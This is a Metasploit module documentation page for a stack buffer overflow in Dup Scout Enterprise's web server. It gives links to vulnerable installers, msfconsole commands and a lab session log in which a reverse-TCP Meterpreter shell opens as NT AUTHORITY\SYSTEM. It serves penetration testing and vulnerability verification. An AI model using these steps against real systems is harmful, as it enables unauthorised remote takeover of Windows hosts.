adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/exploit/windows/http/dupscts_bof.md
T
Brendan Coles 1f00ad011c dupscts_bof: Add additional targets and auto targeting
2021-02-25 17:12:27 +00:00

75 lines
2.9 KiB
Markdown
Raw Blame History

## Vulnerable Application
This module exploits a stack-based buffer overflow vulnerability
in the web interface of [Dup Scout Enterprise](http://www.dupscout.com)]
versions <= 10.0.18, caused by improper bounds checking of the request
path in HTTP GET requests sent to the built-in web server which can be
leveraged to execute arbitrary code in the context of NT AUTHORITY\SYSTEM.
This module supports x86 versions of Dup Scout Enterprise and x86
Windows operating systems only and has been tested successfully on
Windows 7 SP1 (x86) and Windows XP SP0 (x86).
## Verification Steps
Download:
* https://www.exploit-db.com/apps/84dcc5fe242ca235b67ad22215fce6a8-dupscoutent_setup_v10.0.18.exe
* https://www.exploit-db.com/apps/d83948ebf4c325eb8d56db6d8649d490-dupscoutent_setup_v9.9.14.exe
* https://www.exploit-db.com/apps/4ead3eadc19bf3511e8dfd606624e310-dupscoutent_setup_v9.1.14.exe
* https://www.exploit-db.com/apps/3ca0c9aee534994bc6894bfb309e5a4f-dupscoutent_setup_v9.0.28.exe
* https://web.archive.org/web/20170302/http://www.dupscout.com/setups/dupscoutent_setup_v9.0.28.exe
* https://web.archive.org/web/20160408/http://www.dupscout.com/setups/dupscoutent_setup_v8.3.16.exe
* https://web.archive.org/web/20160826/http://www.dupscout.com/setups/dupscoutent_setup_v8.4.16.exe
Install the application from the link above and enable the web server by going to
Tools -> Advanced Options -> Server -> Enable Web Server on Port.
Metasploit:
1. Start msfconsole
1. Do: `use exploit/windows/http/dupscts_bof`
1. Do: `set rhosts <rhosts>`
1. Do: `run`
1. You should get a shell.
## Options
## Scenarios
### Dup Scout Enterprise v9.9.14 on Windows 7 SP1 (x86)
```
msf6 > use exploit/windows/http/dupscts_bof
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/dupscts_bof) > set rhosts 172.16.191.213
rhosts => 172.16.191.213
msf6 exploit(windows/http/dupscts_bof) > check
[*] 172.16.191.213:80 - The target appears to be vulnerable. Dup Scout Enterprise version 9.9.14.
msf6 exploit(windows/http/dupscts_bof) > set lhost 172.16.191.192
lhost => 172.16.191.192
msf6 exploit(windows/http/dupscts_bof) > run
[*] Started reverse TCP handler on 172.16.191.192:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Dup Scout Enterprise version 9.9.14.
[*] Selecting a target...
[*] Using target: Dup Scout Enterprise v9.9.14 (x86)
[*] Sending payload (8577 bytes) ...
[*] Sending stage (175174 bytes) to 172.16.191.213
[*] Meterpreter session 1 opened (172.16.191.192:4444 -> 172.16.191.213:49380) at 2021-02-25 11:29:52 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN-7-ULTIMATE-
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
```
Reference in New Issue View Git Blame Copy Permalink